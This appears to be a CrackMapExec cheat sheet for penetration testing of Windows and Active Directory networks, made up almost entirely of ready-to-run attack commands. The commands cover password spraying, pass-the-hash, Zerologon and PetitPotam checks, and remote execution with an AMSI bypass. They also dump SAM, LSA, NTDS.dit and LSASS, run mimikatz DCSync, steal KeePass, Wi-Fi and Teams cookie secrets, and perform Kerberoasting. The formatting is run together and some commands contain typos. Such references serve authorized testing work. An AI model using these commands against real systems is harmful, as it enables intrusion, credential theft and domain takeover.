CME Quick Reference
Modules
cme smb -LUsing Modules
cme smb <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatzViewing Module Options
cme smb -M mimikatz --optionsUsing Module Options
cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'Kerberos
cme smb zoro.gold.local -k -u bonclay -p Ocotober2022using --use-kcache
--use-kcacheexport KRB5CCNAME=/home/bonclay/impacket/administrator.ccache
cme smb zoro.gold.local --use-kcachecme smb zoro.gold.local --use-kcache -x whoamicme ldap poudlard.wizard -k --kdcHost dc01.poudlard.wizardScan for Vulnerabilities
Zerologon
cme smb <ip> -u '' -p '' -M zerologoPetitPotam
cme smb <ip> -u '' -p '' -M petitpotamnoPAC
cme smb <ip> -u 'user' -p 'pass' -M nopacEnumeration
Map Network Hosts
cme smb 192.168.1.0/24Null Sessions
cme smb 10.10.10.161 -u '' -p ''
cme smb 10.10.10.161 --pass-pol
cme smb 10.10.10.161 --users
cme smb 10.10.10.161 --groupsAnonymous Logon
cme smb 10.10.10.178 -u 'a' -p ''Active Sessions
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessionsShares and Access
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sharesDisks
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disksLogged on Users
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-usersDomain Users
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --usersBruteForce RID BruteForcing RID
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-bruteDomain Groups
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groupsLocal Groups
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groupPassword Policy
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-polSMB Signing NOT Required
cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txtPassword Spraying
Username and Password Lists
cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
cme smb 192.168.1.101 -u user1 -p password1 password2 password3
cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-successChecking Login
cme smb 192.168.1.101 -u user.txt -p user.txtChecking Multiple Logins with username and password list
cme smb 192.168.1.101 -u user.txt -p password.txtChecking one login equal one password using wordlist
cme smb 192.168.1.101 -u user.txt -p password.txt --no-bruteforce --continue-on-succesAuthentication
Checking Credentials Domain
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'Using Credentials
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'Checking Credentials Local
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
cme smb 192.168.1.0/24 -u '' -p '' --local-auth
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-authRemote Command Execution
Execute commands with -x
cme 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoamiExecute PowerShell Scripts with -X
cme 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'Bypass AMSI
cme 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payloadList all readable files
cme smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plusDump all Files
cme smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=falseSend Files
cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt
cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --put-file --put-file /tmp/users C:\\Windows\\Temp\\whoami.txtGet Files
cme smb 172.16.251.152 -u user -p pass --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt
cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\Windows\\Temp\\whoami.txt /tmp/fileWinRM
cme winrm 192.168.255.131 -u user -p 'password' -X whoamiMSSQL
cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
cme mssql 10.10.10.59 -u sa -p 'GWE3V65#6KFH93@4GWTG2G' --local-auth -x whoamiSSH
cme ssh 127.0.0.1 -u user -p password -x whoamiObtaining Credentials
Dump SAM
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --samDump LSA
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsaDump NTDS.dit
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vssDump LSASS
cme smb 192.168.255.131 -u administrator -p pass -M lsassyDump LSASS using nanodump
cme smb 192.168.255.131 -u administrator -p pass -M nanodumpMimikatz
cme smb 192.168.255.131 -u administrator -p pass -M mimikatzMimikatz DCSYNC
cme smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"Dump WIFI Password
cme smb <ip> -u user -p pass -M wirelessDump KeyPass
cme smb <ip> -u user -p pass -M keepass_discovery
cme smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"LAPS
cme smb <ip> -u user-can-read-laps -p pass --laps
cme smb <ip> -u user-can-read-laps -p pass --laps <name if not administrator>
cme winrm <ip> -u user-can-read-laps -p pass --lapsSpooler
cme smb <ip> -u 'user' -p 'pass' -M spoolerWebDAV
cme smb <ip> -u 'user' -p 'pass' -M webdavSteal MS Teams Cookies
cme smb <ip> -u user -p pass -M teams_localdbLDAP
LDAP Authentication
cme ldap 192.168.1.0/24 -u users.txt -p '' -k
cme ldap 192.168.1.0/24 -u user -p password
cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46BASREPRoast
Without Authentication
cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txtWith Authentication
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_nameFind Domain SID
cme ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sidKerberoasting
cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txtUnconstrained Delegation
cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegationAdmin Count
cme ldap 192.168.255.131 -u adm -p pass --admin-countMachine Account Quota
cme ldap <ip> -u user -p pass -M maqGet User Descriptions
cme ldap <ip> -u user -p pass -M maq --kdchost 127.0.0.1 -M get-desc-usersDump gMSA
cme ldap <ip> -u <user> -p <pass> --gmsaExploit ESC8 (AD CS)
cme run ldap <ip> -u user -p pass -M adcsList all Certificates inside a PKI
crackmapexec run ldap <ip> -u user -p pass -M adcs -o SERVER=xxxxExtract Subnet
cme ldap <ip> -u <user> -p <pass> -M get-network
cme ldap <ip> -u <user> -p <pass> -M get-network -o ONLY_HOSTS=true
cme ldap <ip> -u <user> -p <pass> -M get-network -o ALL=trueCheck LDAP Signing
cme ldap <ip> -u user -p pass -M ldap-checkerRead DACL Right
cme ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET=Administrator ACTION=read
cme ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET=Administrator ACTION=read PRINCIPAL=BlWasp
cme ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET_DN="DC=lab,DC=LOCAL" ACTION=read RIGHTS=DCSync
cme ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET=Administrator ACTION=read ACE_TYPE=denied
cme ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET=../../targets.txt ACTION=backupPassword Spraying
WinRM
cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforceMSSQL
cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforceSSH
cme ssh 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforceFTP
cme ftp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforceRDP
cme rdp 192.168.1.0/24 -u user -p password
cme rdp 192.168.133.157 -u ron -p October2021
cme rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforceAutrhentication
WInRM
cme winrm 192.168.1.0/24 -u user -p password
cme winrm 192.168.1.0/24 -u user -p password -d DOMAINMSSQL
cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB
cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth
cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --port 1434SSH
cme ssh 192.168.1.0/24 -u user -p passwordLast updated